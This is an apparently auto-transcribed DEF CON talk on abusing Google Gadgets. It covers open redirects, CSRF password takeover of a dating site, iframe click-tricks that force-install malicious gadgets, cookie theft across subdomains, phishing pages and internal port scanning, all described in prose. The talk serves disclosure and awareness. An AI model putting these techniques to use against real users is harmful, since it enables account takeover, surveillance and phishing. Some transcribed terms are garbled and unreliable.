 Yes, thumbs up. Yes, good, perfect. All right, so my name's Robert Hansen. This is Tom Strasner. We're talking about exploiting Google gadgets. It's nice that you guys could come and join us. I thought the room was going to be about a third this size. So welcome to everybody. You might have seen some stuff in the news over the last couple days, front page of MSNBC, Associated Press. It's all over the place. So we modified the speech a little bit from Black Hat just because we got more information over the last couple days. And we also had to shorten a little bit just to fit it in the hour time slot. So we're going to be kind of racing through a couple points. But you'll get the good stuff. Tom? So of course you know Robert. He really needs no introduction. Then my name is Tom Strasner. I'm a senior security analyst for Synzac Inc. We're an application security company specialized in producing an application security scanner and do software as a service. So I'm their chief analyst. And this is Robert. I'm Robert Hanson for the five people in the audience who have not met me. Please come up afterwards. I'd like to talk to you. But I run a small consulting company. It's five people. We have more billion dollar companies than we have employees. And I run a small website called hackers.org and slackers.org. Have you heard of it? Anybody? OK. Yeah, there's one person back there. So who's our snake? Yeah, who's our snake? That's me. So I just wanted to start off by saying thank you so much for having me. This is the first time I've ever talked to Def Con. I've talked to Black Hat three times. But this is the first time here. So I'm actually really honored to be here. I wanted to start this whole thing off by spending a couple minutes. And I apologize, but I kind of want to do this because I think it's important. Talk about the history of how this all came to be. There's been a lot of miscommunication, I think mostly on my part. And there's been a lot of reasons for that. A lot of people that I had to protect and a lot of stuff going on. I didn't want to do things too quick, too fast. So I want to talk about what happened. And hopefully that'll explain some of this stuff. Only a few people know the story. Myself, a couple of people at Google know new parts of it as they kind of floated in and out of the company. I'm the only kind of consistent factor in all of this stuff. So just sit back and I'll explain. So before we start, I think we've all heard these types of sentiments before, different companies. This is Google's version of this. If you find a vulnerability, we ask that you share with us and we'll let you know and we'll fix it in a timely manner or whatever, the kind of normal jargon you get from big companies. So we'll get back to this. This is director at Google. So this all started about four years ago, 2004. I found, well, not me personally, but the people I was working with and found a bunch of redirections were being used by fissures through Visa DoubleClick eBay and Google to try to anonymize and or confuse users as they were clicking through things to land on the amount of page that they didn't assume they were gonna be landing on. So we told everybody about the problem for those of them who weren't aware and of course no one was aware. So we told everybody that it was happening and everyone perked up immediately and said, oh yeah, that's bad. So they went off to go do their fixes or not. So in this case, Visa closed their hold down in just a matter of hours. It was amazingly fast, incredibly fast. I've never seen anything like it and usually redirects are kind of complicated to close because you have a breaking functionality. DoubleClick fixed theirs within days but they only sort of fixed it. They fixed it with a black list. They said they have a permanent fix for it but they didn't want to turn it on because they didn't want to incur the usability hit if they didn't have to. They thought it was a one time deal and for them it was. So they did a good job. They have the ability to turn it off anytime they feel like it. eBay fixed it within a couple of weeks and there was a bunch of reasons why I took that long. Like I said, a lot of the functionality that they had to kind of deal with and they broke stuff and so they had to fix that other stuff. And Google still hasn't fixed all the vulnerabilities and it's been four years. So word got out fast. This wasn't just something that a couple of companies knew about. Like it's out there. Like this is happening. It's in people's inboxes. I'm not making this stuff up. So 2004 was when it really started. About 2006 it started being used for spam as well. But it's out there. I mean if you search for this stuff you're gonna find it. So there's a couple of failures that kind of came to be throughout this whole process that I'd kind of like to point out. Everybody's got vulnerabilities. I'm not the guy to say, oh that guy's horrible. He's got terrible security because he's got one tiny little redirection hole. But I'm pretty sensitive to people's problems but I also try to protect consumers whenever possible. So we informed Google that they were actually being exploited and they said, okay we're gonna fix this but we're gonna do it with a blacklist. And I think we all know how to get around a blacklist. You just change a character and you're past the blacklist. So that didn't exactly work and the bad guys figured it out as fast as I just told you. So we felt like this kind of bad, we should be talking with them so we had a bit of a dialogue and they just wouldn't budge. And it actually took a really long time to even get them to implement the blacklist. I don't have a timeframe for you but it was months. So there was a bunch of reasons why you'd want to fix it. Sorry, why not to fix it rather. It's expensive, you have to hire or if you don't have, already have the engineers on staff. You have to QA it and release it and you break stuff and you gotta go QA and release that stuff and it takes time and that kind of stuff. It's useful for tracking users and that's the primary reason why most of that stuff was there in the first place. It was actually designed so they could track people as they're navigating to the site and click on links so that they can do navigation changes or tune their rules or whatever. So and lastly, it would break stuff like feeling lucky which is a huge portion of why people like Google so much. You can click that button and you're on to the next page and it's great. You don't have to deal with them, the whole search results thing. I don't know, does anyone actually use that by the way? Raise your hand please. Like one, two. It's okay, Google, you can fix that one. So why two, fix it? Ultrism, right? It's the right thing to do. Google's not evil, right? We're trying to fix a consumer level problem. It's being used. It's not a theoretical attack. It's actively being used by bad guys. We've got tons and tons of examples of it and ultimately it stops contributing to the problem. So I waited two years. I sat on it, I talked with them, I didn't do anything for two years and then I went full disclosure on their ass. So I don't hate Google, right? But I like consumers a lot more, it turns out. So first thing I did was release four redirection vulnerabilities on full disclosure. I think it was, or bug tracks. I can't remember which one now. And I didn't get any reaction. No one even commented on it or anything. So I was kind of like, well, that didn't work. So then I disclosed Nexus S vulnerability and then suddenly it exploded. Everybody was all interested. Everyone wanted to talk about it and it's like, it's the same damn thing. I can redirect either way. Sure, there's other stuff and I can grab cookies but the bad guys are really very interested in this redirection thing too. So I was trying to use that as a point to leverage the bigger picture, which is that we need to close down this redirection thing that's still there. It's been there for years. We're gonna fix that. So Google actually agreed with me. This isn't something like, they're like, no, no. This isn't something we wanna fix. Matt Cutts is their head search guru. He's kind of the unofficial spokesman for search. And there's three different examples of him on the net talking about why this is bad and how it's being used for fishing attacks. So Google knows, they agree. This is not me just sitting up here telling you it's a bad thing. They agree with me. So why do I personally care about it? So first of all, let me explain how fishing technology works for those of you who don't deal with this every day. First, you have known good sites. So like the website, Annie Bay, Citibank, those are the whitelists. You don't wanna mark those as fishing sites even though they're looking awful like a fishing site. It turns out they're the real site. The false positives, good example is Google cache, for instance. You don't wanna block Google cache. So you have to put that on the whitelist. Webmail, it looks awful like a fishing site. It's got a form on it. It might even say username and password even though there's no username, password field necessarily. So you gotta mark all that stuff as whitelist because you don't wanna deal with it. Your CSRs don't wanna get overloaded. It's in the butt. So second is blacklists. You have a known set of bad things. People are sending to you or you detect it or whatever and you wanna mark it as bad and you throw it in your anti-fishing stuff and then everybody's safe a couple hours later when it propagates for 10 minutes or whatever it is, depending on the technology. And lastly is heuristics. Heuristics really aren't very good, it turns out. I've read tons of papers and every paper I've read just it blows up in real life when you actually look at the vast weirdness of the internet. And you also have DNS sometimes but that's stuff like open DNS and it doesn't work at all because fissures have learned to use IP addresses so that doesn't matter. So Google is not exactly the most forgiving company when you mark them as a fishing site and you block a million people from going to their website. And well we did that because it turns out they were a fishing site. And we felt bad about it but really at the end of the day you have two options, right? You either aren't a fishing site or we mark you as a fishing site. So it's really, it's up to them to stop being a fishing site. So I found this Google gadget thing just kind of randomly looking at it one day. And by the way, I never, never go to Google so within five seconds I found this thing too. So it happens that JavaScript can redirect as well. It doesn't just have to steal cookies or all this other stuff, it also can redirect. It's pretty good at it as a matter of fact. And it turns out that most people have JavaScript turned on especially when they're at Google because Google breaks a lot of stuff if you don't have JavaScript turned on. So I'm nice though, this time. I'm actually trying to be nicer to Google. I kind of fluctuate. Sometimes I'm like, come on Google. And the other times I'm like, Google, you know. So this time I actually released it to them, I sent it to them and I'm like, all right, here it is, I'm being a nice guy, gentleman, go fix it. They've been pretty good about XSS in the past. So their response is, on further review, it turns out that this is not a bug, but instead the expected behavior of this domain. All right. Since these modules reside on gmodules.com domain instead of Google domain, cross protection stops them from being used to steal Google specific cookies. So they gave me the definition of XSS. Well, it turns out that I wrote the book on XSS. So my response was a one word wow. Because what are you gonna say to that, right? So shame on you, Google, right? So Google already agreed that this was bad, right? They agreed, we're on the same page. Google's still an evil litigious company. It's maybe now so than ever. There's a lot of reasons that they're more careful about how they protect their brand. Google doesn't have the first clue about what JavaScript could be used for, apparently. And they lied about the danger of the vulnerability that they had already agreed to fix, in this case, the redirection vulnerability. I'm not gonna worry about that guy. So, and bad guys are still using it. So there's other stupidity that just kind of rolls into all this stuff. This is another guy who found the exact same type of vulnerability, but it was in blogspot. And he said, this is an email that he's relaying to me. The issue you describe is not actually a vulnerability and is not cross side scripting. In this case, you are simply including a loud script in your blog. This does not constitute a security breach. You heard me? If you include malicious JavaScript, that's not a security breach. You heard it from Google. So it turns out that Google is marked as the most top infected IP range by StopBadware, by their own metrics. This is not somebody else's metrics. That's theirs. They were quick to remind me of that. I don't know why that helps, but there you go. This is something that was posted on my blog. So normally when people are posting on my blog, talking to me or to other people. And in this case, he's talking in third person. So Google, their internal department is trying to defame me on my own website from their own IP space. So it turns out I'm pretty good at looking at my logs. So meanwhile, more holes are opening. Things keep opening up and we're not getting ahead of the problem. We're actually opening up more vulnerabilities. So I kind of want to get ahead of this problem because it turns out that this is, my mom serves the internet. I kind of care, right? I've got a vested interest. So ultimately, I just want to stop fighting and let's all just get along and fix these things because I don't really like playing this game. I'm getting old, dirty, balding a little bit. So this is some other press-worthy stuff. Regarding the security flaw disclosure, actually this is about a Google desktop thing that I found unrelated to this particular topic, but just some context. Regarding the security flaw disclosure, Mr. Merrill, who was their CIO, I think he just recently left a couple months ago or something, says that Google hasn't provided much because consumers, it's primary users today, often aren't tech savvy enough to understand security bulletins and find them distracting and confusing. They're very distracting. All this security stuff and all of you, you're too stupid to understand all the security stuff. So because Google fixes, because it's something they make in the servers or deemed invisible, they shouldn't have to tell you guys. And another thing, phishing problem, we were talking about something else, but news.com basically said, in the two months since our snake first made its concerns public, no one from Google has publicly disputed anything he said. So it turns out, yesterday, or two days ago, Google did dispute something I said, finally. So it's been four years and they finally said, we don't agree with you. And the one thing they said they don't agree with, not any of the actual security stuff, that they do agree with me on, I guess. But the thing they, and by the way, it's funny, they didn't come up to me and tell me that. They told the Associated Press. So there I ran and I'm the United States and the Associated Press is Syria. So we're doing this three trifecta thing now. I can't talk directly to them. I gotta go through Associated Press or you guys. So here we are. And the thing they didn't like about what I said is that they said, in the very few cases that they found malicious software on G-Modules, implying that it has happened, they were able to quickly take it down. So, Tom, I don't know, did you ever have your G-Modules taken offline? No. I still, I haven't had mine taken offline. I took my own offline, because there's a long story, but I have Jeremiah's password in one of them, so. So we're just kind of exacerbating some of the other problems. And we have to kind of go, like I said, pretty quick through this, but Google is and will be, and always has been vulnerable. They haven't been open about with consumers. They haven't fixed them in a timely manner. It's been four years. And remember, if you share it with us, we will fix it. So we shared a couple of different vulnerabilities Tuesday, which you'll also see. And I still haven't been told the timeline, so we know this is not a true statement. It certainly hasn't happened for any of the redirection stuff. They have fixed some of them, but they haven't told me when, they haven't interacted with me on that level. And ultimately, this all comes down to the fact that they just want to track you guys. So. What's up, Def Con? I really don't see enough beer in anyone's hands. I don't know what's happening. This is terrible. Oh, good, good, good, good. So this slide is really the, it really summarizes the essence of our talk, and it boils down to if today, most malware is specifically engineered for Windows. In the future, malware will be specifically engineered for the web. And I don't think there could be a more true statement. And this is a PDP quoting someone from his blog. And so our speech is really forward-looking in this regard. And while Robert's introduction was essential to give you the background and the motivation, there's actually a larger issue that we'd like to draw your attention to. But before we go and talk about that, I just want to be clear about what's at stake. And so there is the gadget XML construction that you actually create when you write your own gadget and this gets hosted. So in the C data section of the gadget, you can instantiate arbitrary JavaScript and HTML. If you browse to this URL directly, it'll execute. This is one dimension of the problem. It's also a dimension which leads to phishing attacks and content spoofing. But there's an entirely other dimension. It's what we're calling gmalware. Because we think that sounds like a Google trusted type of malware. And the idea is it's just a bad gadget. Now is this a problem today? Is it rampant? No. All of the bad gadgets that we'll show you, we created in the lab, that being said, the potential is there. And it really points to a wider problem. I'm gonna skip a few slides just so that we can get to the movies, because they rock. But the broader issue at stake really has nothing to do with Google at all. But it's the business end of the crack pipe of Web 2.0, right? And it is that everyone should be able to create their custom content and share this and be interactive and form communities. And you have this situation where you are empowering users in the form of gadgets or widgets or whatever. And whatever you're talking about, Facebook or Google or anything, as long as there's code written by untrusted third parties or that anyone can contribute to, once the profit motive is there, then the malware incentive will exist. So no, there's not a lot of gadget based malware today. But the potential exists and it's actually a much broader systemic problem. So what about Google gadgets? Well, they're simple to build. You can run them on multiple sites. We'll talk about those in just the next slide. And in Google's own words, they have the potential to reach millions of users. So high volume. I think it's important for you to understand that Google's vision for gadgets is actually pretty cool. They speak about it often in ideological terms. So I'm gonna just go through a number of points that really summarize what I think of as the spiritual heart of the idea of gadgets. And one is that they should spread via the social graph in a viral way. And this is really sort of a word of mouth, blogosphere way of spreading gadgets so that everyone ends up using them. They're decentralized. They're also cached. They're distributed so that if your gadget becomes a big hit overnight, it isn't gonna crash some server if everyone's using it because of the way the architecture is built. There's a fundamental idea of content-rich self-expression, and that's really where Google comes back and says, yeah, that's why the arbitrary JavaScript and HTML is needed. Over time, gadgets are supposed to dynamically change. And that means that as each of us in this room have our own favorite gadget, and we're using the same gadget, that as we use it, the gadgets can collaborate. And ultimately, the states of our individual gadgets will change to reflect, say, our own opinions. And Google calls this the social graph, right? And it's essentially an objective, what you might think of as an objective tap into the collective behaviors of the gadget as it's spread over a base of users. The idea is to expose the activity stream and to be able to create sort of visualizations of that and show, oh, look, this is the activity of the gadget. Finally, gadgets wouldn't be very interesting if they couldn't drive communication. The ultimate idea is that we should really use these and form communities around them, whether it's smaller communities or larger communities. The idea is that people participate in a gadget system and that gadgets should solve real-world problems and ultimately generate revenue. Google has seed money. I think it's $100,000 for anyone that proposes to them a business plan where there's serious revenue generating capabilities of a gadget. So the point being there is that once money actually starts flowing through, and once the financial incentive from malware exists, then you're gonna start seeing more of this type of thing pop up. Yeah, and I mean, we already have the idea of phishing and it's already being actively used, right? Robert, speak to that. But that's not a good business model. That won't get you the $100,000. Try something else. Please. So where can you put your gadgets? Well, you can put them on iGoogle, your iGoogle homepage. You can put them on arbitrary websites. You can build them to inter-operate with like Orcot using the open social API. Or you can create them to interact with your desktop, which foreshadows a lot of the problems that we're likely to see. So what are the high-level security concerns? When Robert and I stood out to do this speech, we really just sort of scratched our head and said, what a priori, what are the problems we expect to find? Now we made a long list and we actually created proof of concepts and discovered vulnerabilities that closely matched our initial expectations. The high-level concerns are that gadgets can be easily weaponized. You can turn them into payloads. And by a payload, I mean specifically that, a malicious gadget designed to deliver a particular type of malicious code to the user, whether it's Flash or JavaScript or whatnot. They're written by who the hell knows who, you know. Third-party code can be contributed and this is part of the web 2.0 vision, right? But the end result is that you really have to stretch hard to find accountability within the gadget community or who wrote it and can I have some level of assurance as a user that I'm getting what I think I'm getting when I use this gadget. What we will show you is that within, within your iGoogle homepage, gadgets can attack one another and they can potentially attack the desktop. And of course they can have the same vulnerabilities as most web apps. So I just would like to present to you a basic warning so that there are, Google does suggest that there's a potential risk there with gadgets. For instance, most of our gadgets are created by third parties. If you have questions or concerns about the functionality of your content, contact the author, right? That doesn't really do you very much good if you have a malicious gadget that's tracking your behavior. You think the author is going to be sympathetic? No, of course not. From a high level perspective, I'm just gonna breeze through these. There's issues in gadgets with JavaScript, HTML and script injection. There's the potential for defacement of one gadget or manipulating its content through poisoning. And this is kind of a weird thing, but if you can imagine scenarios with cross-site request forgery, where the gadgets themselves are measuring, say, some rating or approval or some voting process and that there would be ways to manipulate gadgets in order to skew that toward one party or the other that's in the voting queue. You can spoof gateways very easily and it's not always clear whether your connection is secure when you're using them. But ultimately, and this really speaks to the fresh brand of gadget malware that Robert has created because you can perform surveillance in a very invasive manner and you can also create exposures. Finally, there's a whole range of bad things. Hopefully our videos will speak to that. And the underlying point is that it's not that gadgets are bad and should never have been created, but that if you're someone with malicious intent, you can really do some very dangerous things. I really loved this because I was poking around creating some gadgets and this was actually a testing container for gadgets. And if you'll look up here, this was Google's coders completely. It has the option to do evil. And Robert created the sort of Shakespeare pearl version of the humor there for you to appreciate. But I just found that to be absolutely freaking hilarious. So the advanced API digs down into the desktop, really mucks around there. And the important point to take home is that there is the potential for these little mini applications that exist on your iGoogle homepage to interact with your desktop, right? Now, maybe you see the big warning there when you read and you say, well, maybe I don't want to install the performance o-meter, but actually it's not so clear cut in the wild because we can create some very malicious gadgets that you may not even know you've added. So thought experiment time, the people's gadget. The reason why I've chosen this topic is because there's no better example of an agency that has coercive intent than a government that attempts to suppress certain rhetoric or to monitor subcultures. And so this will just give you a framework in order to understand how one could use what you might think of as relatively innocuous functionality to create some very malicious gadgets. This is pure shock value, but this guy's about to get run over by three very big gadgets. Are you feeling lucky? Yeah. So what types of, if you think of just, what types of innocuous functionality could actually become dangerous if your intent was to spy or your intent was to be coercive? Well, even something as simple as monitoring the incoming feeds that you're pulling in from website for content, counting word frequencies and actually determining if the content is subversive, you could actually have a gadget that is uploading your IP address in the search terms that you're using. It'll show you that. You can have a gadget that actually looks in spider's websites that you retrieve content from and so that this gadget could actually determine to build a picture of the world around itself. Now it shouldn't be lost that the gadgets of this nature can also spider and crawl your internal network. So while you're happily surfing away at iGoogle, this thing is plunking away at your internet. I don't think there's much more to say on that. Some of the serious problems boiled down to cross-site request forgery. I'm not gonna spend a lot of time on this slide because I have a movie, Robert. Do you wanna speak to anything? Yeah. Just very briefly, a couple of them. So the one that you can see at some site.cn. So one thing about the Chinese firewall is if you send certain packets through, like the word like Falun, which is Falun Gong, which is sort of like Tai Chi, except way more dangerous, if you send that across the wire, the Chinese firewall will shunt you for like five minutes or something. So if my business happens to do a lot of business, while going through a single NAT at IP address, I can basically essentially DOS you from connecting to your supply chain management or whatever in China. And then another one is like child pornography. There was a couple cases of that where somebody was inadvertently downloaded or got some spyware or whatever and you guys have all heard those cases. But one example is, I don't necessarily have to even know where child pornography is. I just have to construct enough query strings, send you through whatever, and you end up on those pages. And it turns out I'm pretty good at guessing what child pornography contains. So, SQL injection, remote file includes all that stuff. I can force you to connect to any internal websites or external. I can force you to hack on my behalf, all kinds of nasty stuff. So, I mean, just cross our cross forgery. I think you're all aware of it. We'll have an example though. All right, so let's get into the movies and we'll show you. The first example that I wanna pull up and show you is an example of G malware. Now, the general concept to take away is that you have a popular site that you suspect the user is going to have an account on. You create a gadget designed to take an action on that account through cross site request forgery that the user isn't aware of. Now, in the demo I'm gonna show you it's really obvious. It's very, I made the windows expand to full screen and everything. But in real life, you don't have to see any of this. So, actually what I'll show you is owning singlesnet.com with a little gadget. It's actually the Hello Kitty gadget. So, here's our gadget. Click me, hello. So, here we are. We're player John Hancock 2000 and we're logging in. So, we were trying to get a good hook up here on singlesnet. I reported this vulnerability two years to them. Two years ago. And I'll tell you the response after you see the demo. But ultimately you can see that here I am. This is my email. And you'll notice you can change your password. New, but you don't have to input your old password. Okay, so you just put your new password in twice. And there's zero protection against cross site request forgery. So, you can actually create a form, spring loaded by JavaScript mounted on a server. And then I just instantiate a little popup window in JavaScript, stick it off screen. And so it immediately launches a CRSF attack against this site. Having clicked the gadget, our password is no longer valid. So, now we're gonna log in as the attacker. And we can log in with the same username or with a different email address. And of course with our brand new hacked password. And so now you can notice that the attack, just the gadget itself changed the contact email. So, this is one example of a piece of maliciously designed gadget technology that could trick the user into performing an action that they don't want to take. And it's not limited to singles.net. It's just that they are highly susceptible to it. So, other things that we, what I said about my contribution to this part of the, to our talk was to actually port some, what I think of as like hackware, JavaScript to gadgets, just to see how far I could go. So, one of the things that we ported, and in my blog, badgadgets.net, I'll put up the links to the XML if you actually wanna play with these abominations. But ultimately, we ported PDP's Yahoo Site Explorer spider so that it queries the Yahoo page data service and gives you a spidering of a website based on that. And you can call external PHP scripts. That's just sweet. Especially if you wanna do like a shotgun attack against a user's browser and root them. You can actually do that just fine with a little gadget. Consequently, scanning for this sort of thing is kind of hard because since they allow you to just pull up arbitrary content, you're not actually see the malicious code inside the gadget itself. We also, so this is a PHP spider. So in all its glory, this is the example of the PHP spider that we were talking about. So the gadget can literally spider your internet while you're using it without your knowledge. Or it can use Yahoo's Site Explorer. Finally, I ported a port scanner. Once again, PDP from his attack API. I just ported the port scanner from there into a gadget. Worked great. Now, this is a picture of a phishing gadget. And actually what you are seeing is a page rendered from the XML content of an existing gadget in the C data section. The JavaScript and HTML is rendering. And it creates this fake page. And so we can use any type of coding style that we want to make perfect, basically, you know, simulacrums of any login portal. Consequently, from some conversations I've had with Google, and I don't want to call the guy out by name because I actually have a pretty good working relationship with this guy, so I'm not trying to smear mud. But there's a belief that this just really isn't that a very significant problem. We really kind of beg to differ. Do you want to add something? So I know this slide doesn't really look like a whole lot, but I think this is probably the most important slide in the deck, even though it doesn't look like much. So imagine you're kind of tired, first, I'll take you out of the picture. Imagine your mom is pretty tired in the morning, she got her cup of joe, woke up a little sleepy, watched I Love Lucy, you know? And she wakes up, boots up her computer, double clicks the internet explorer icon, takes her to her home page, and it's Google. And she's already authenticated because she never cleans out her cookies. She turns her back, takes a quick shower, something comes back, and she's presented with this page. She didn't click on a link, she didn't type anything in in her email breast bar, she just clicked on a link. She didn't get an email, she didn't click anything. There's no user interaction required whatsoever. You go to Google and you're immediately presented with a phishing site. So when they're talking about, you know, you can't run JavaScript in context of Google.com, who cares? I don't have to, I can immediately redirect you to something that will basically every user is gonna fall for this. There's only a very small handful of users, probably in this audience, and that's about it, who won't fall for this immediately. And I think actually quite a few people in this audience probably would anyway, so. So the final thing is, you know, exporting a tab to your buddy, and then the tab is sort of the container where all your gadgets live. What I find really telling about this is you can export your gadget, but even Google says, otherwise, blah, blah, blah, be careful, your settings can include private data. So what this tells you directly is that your gadget isn't just some private little world that you own exclusively and doesn't have any touch points to the internet or the broader iGoogle framework. Your data resides within that gadget and you can expose it. And I think that on that note, I'm gonna hand it back to Robert. So we built this tiny little gadget. I apologize for having used multiple media players here. Does anyone know a really good media player that plays just everything, so I don't have to deal with this anymore? KAM, okay, got it. So there's two gadgets here. This one over here on the left is my little stockbroker application that I wrote. Just kind of keeps stocks, tells you how much stuff is worth. Kind of a funny side note is Google is $1,800 a share. They haven't learned how to split yet. And on the other side is the bacon because swine is evil. And so you'll notice they're on different domains. Now, I thought the different domain usage was actually a security function, but it turns out that I've talked with somebody at Google and they said indeed it is not meant to be as a security function, it's actually meant for caching purposes. So that's good because it wasn't much of a security function. So here, I double clicked and clicked on the link or whatever, I didn't have to click on a link, it could have just been automatic, I just did it to slow things down so you could see what was going on. And it popped up in a bunch of iframes, which are just all of those different domains, all the different subdomains, so 81 through 90, I just picked a range to speed things up. And I found one on the other domain, which is 86.com or 86.gmodules.com rather, and which immediately does a redirection, or immediately as I felt like, I think I'd give it like 10 seconds or something. And so what happened is I detected that there was a cookie in that other subdomain. So even though those two things are separate, they share common elements because things like cookies work on the entire domain. So all I had to do was search for something that I thought might be there, and in this case I wrote a really terrible application that used cookies, and I was able to steal information out of it, including the cookie, which it could have login information. A lot of gadgets are very poorly written and have like unencrypted, nothing, you just send your data to some third party who then authenticates it for you to some other third party, like really scary stuff actually. So you can see here that I've done an XMLHP request, grabbed everything, all the content of that gadget, thrown around the page just so you could see that in fact it is there, and rendered the content as well. So you can actually see that it is indeed the same gadget. Keeping state was a little tricky, but it turned out it was not that hard to code. So I can see stuff that's like stock tips or whatever, in this case, it says to sell on a rumor of a G-module exploit. Oh, so this is, I just decided I've got a lot of really crazy logs. So I decided to quickly parse through them and see if I got anything out of G-modules, and indeed I did. This doesn't necessarily have anything super sensitive in it, but this is only a couple of examples, how many people are really linking to me. But this easily could have contained all kinds of crazy stuff. Who knows what these people are putting in this URL structure. So a lot of people are gonna say like, okay, you've demonstrated that the gadget framework potentially is dangerous, but who cares? How are you gonna get it into somebody's eye Google? That's the real trick, right? That's why we're all here. If you can't do that, this is a totally moot point. I hate conferences, I hate speeches that just, oh, theoretically, if I had your password, well, okay. So there's a couple different ways to do it. First of all, they can add something that they think is good, a breakout. It started off being good, it was a neat little gadget, and then suddenly I'm like, oh, I've got so many people, and then I take them all over. And so that's one way. Another way is that we can hack into somebody else's gadget framework. Someone else is doing that hosting and have them change their thing just slightly and into something bad. And it turns out websites are very easy to hack into. We haven't yet found one that we can't. The other way, and this is a bad way, I don't actually think this is really hardly worth talking about, but if you have cross-site scripting on Google, and if you have it, why would you care about this? But if you had it, if it was like a reflected XSS, you could use this as more of a kind of a persistent container for your cross-site scripting. So if you need longevity, like a long-term attack, it took a long time to do cycles, or a lot of CPU, or whatever, or you wanted to test many, many, many different things, well, this is one way to do it. Barely worth talking about, though. And we can force them to add it remotely, evilly. So, we created this little demo. And this is a little confusing to watch, and I apologize. I didn't want to get on the Defcon network and just worry about bad demo karma. So the IE instance is a bad guy. The Firefox instance is a good guy. The IE instance is, actually, this is Jeremiah's account, long story. And so I'm using it to contain data and hold on to that account, and I'll be monitoring it. So you can see that's vulnerability master is the bad guy. And I'm in his web history, you know, whatever section of the website. So you can see nothing up my sleeves. There's nothing in there. I refreshed, and in fact, there is nothing in the web history. I cleaned it out just before I did this. So then I refresh, nothing there. There's no gadgets. I'm in this Teddy Lava, you know, Teddy's this nice woman who's, you know, doesn't want bad things to happen to her. And you notice she's on the hackers.org, right? So what you see here is this little add it now thing that I made semi-transparent. I could have made it completely transparent, but I kind of wanted you guys to see what's going on. Well, that's two iframes. There's an iframe that's floating in space that's following the mouse cursor. We all seen those things. Things trail your mouse and you're like, ah, you know, it's like a little clock or something. I hate that. Well, that's an iframe into another iframe, which is kind of positioned up into the corner. So it's just kind of frames exactly the specific XY coordinates that I need to be right under the mouse cursor. And you can do it for Internet Explorer or Firefox. It's just you have to deal with the kind of the cross and how wide it is or where it's located. So when I click on it, I'm not clicking on mydomainhackers.org. I'm clicking on Google. It's a couple of iframes away, but it's still, that click is going all the way through all those iframes to the real, to Google. And what it's doing is it's adding a malicious gadget that I've constructed, which normally is supposed to be off limits. I'm not supposed to be able to add, enforce people to add my own gadgets. So if you hit refresh, you can indeed see that there's a new gadget here, the bacon gadget. It's a different bacon gadget. And this little broken link right here, or broken image rather, I made it visible so you could see what's going on. And this is cross site request forgery, but it's kind of same site request forgery. But what it is is it's a URL structure that allows you to log somebody into an account. I don't know why you can have all that stuff on the get string. It's not really a safe way to do things anyway. But you can do it, so you can force somebody to log in as yourself if you really felt like it, which really doesn't seem like a practical attack for the most part. But it turns out it's fairly useful. And a side note, it doesn't really matter if they fix this vulnerability and like stop that because I can actually, since I own this, I can do form submission and as long, unless they admit a nonce or something that I don't have control over, it's kind of pointless to fix that. I didn't find that vulnerability. It's Stanford founded a couple of months ago and it's still open. So you can see that this image didn't render because it's not an image. And now I'm gonna, Teddy's gonna type in something that's very, very scary to her and she's got a little problem. She has her bees in the itch a lot. But she's feeling lucky today. So she clicks the feeling lucky button. And so she sees the content that she's interested. Now I'm back in the vulnerability master account and I hit refresh. And indeed here's her search string because she's not in her account anymore. She's in my account. So I can subversively watch her type queries in. So that whole, being able to keep that the separation of all those things is totally dependent on whether I control your browser session. And if I've got a Google gadget there that allows me to do whatever I want, it's just up to my imagination about how bad I wanna be. So these are very simple examples. I mean, how long do you think this took me to build? You were there. Two minutes? Two minutes. That's not like a long time. I didn't spend a lot of time on this demo and maybe arranging it and making it look nice. Yeah, but not building it. This is not a difficult hack. You guys can do this stuff. And if you can do it, that's pretty scary. We need to fix that, right? So anyway, that was sort of the point. So yes, this is a problem. It's just not being widely exploited yet. So the real question is, is this expected behavior? Right? Are we okay with that as a community? Are we okay that a gadget has complete control over our desktop? You know, a lot of consumers are gonna say, yes, as long as it's not bad. And that's the real trick, isn't it? We gotta figure out some way to have a container and stop all that stuff from happening. And we don't have that yet. So the real point is, it's bad. It may not be a true vulnerability in the sense that having a gadget isn't a vulnerability. It's bad. So if I were a product manager in the Googleplex and I were to say, and some guy had to come up and me say, hey, by the way, you can fish users. You can do internet port scanning. You can do redirection, all this stuff. You know, I'm a product manager. I'm gonna say, you know what? Maybe we should go rethink the security model a little bit. So whether it's actually a vulnerability or not, it's bad. And that badness means that we should be talking about it as a community. I got a lot of flak from this, from Atsano. And actually, I think we kind of came to a conclusion with that. But I think it was mostly miscommunication on my part. I didn't tell them the history. There's a lot of stuff going on here. But I don't hold anyone for blame for not understanding this, why it's a problem. But I think we should start talking about it as kind of the wider security context of the browser rather than this microcosm of one small widget. I mean, that's not a widget that I'm worried about. It's everything else. It's people's accounts. It's how the browser reacts to that widget if it's under my control. So redirection ultimately abuses that trust relationship. It all comes back to the original redirection problem that I was hounding them up four years ago. We still haven't found a way to stop that. And unfortunately, JavaScript is still out there. I was told that Google did fix the Feeling Lucky function so it's no longer exploitable. So I typed in R Snake into Feeling Lucky and I hit enter and it took me to hackers.org. Does anyone think that I can't put malware on hackers.org? It's exploitable. I mean, it's not, maybe they can shut it off after the fact but that's sort of that reactive security that we've proven time and time and time again that that just, it doesn't work unless you're okay with a couple people getting compromised. And I personally don't really like when people get compromised. I mean, my mom is one of those people and I want to keep her from getting compromised. So, and she tends to click on a lot of stupid stuff. By the way, somebody at another conference asked me, what do you do when you tell your mom like, bubble up, I just say, mom, you're already compromised. And she's like, oh no, am I? Like, yes. And she's like, she won't shop on anything anymore. So that's perfect. So that's kind of the end of the speech. I don't know if you guys had any questions. Yes. So there's actually an interesting, he's asked, is there a JavaScript that actually does detection and actually tries to react based on the fact that someone in particular is looking at it. And yeah, actually one of the most interesting things out there is there's a way in which you can do browser sniffing to tell how wide and tall a screen is. And some of the malware guys have decided that that's actually a really good way to tell if someone's a computer savvy. And in that case, they won't deliver the malware. So if you have a really wide screen, really tall, you're probably computer savvy, so they won't give you the malware. If you've got a little 640 by 480 screen, you're probably someone they can exploit because you've got an old computer and you probably don't know anything. Yes. I don't know that there is a way to stop them from doing it. I mean, if you're sitting here listening to me tell you, that's not a good idea. I don't have any control over Facebook or any MySpace or whoever else. All we can do is keep informing them of the problem. Yeah, there's a lot of background noise. So just come on up and ask us questions after the talk. Thank you everybody. Thanks.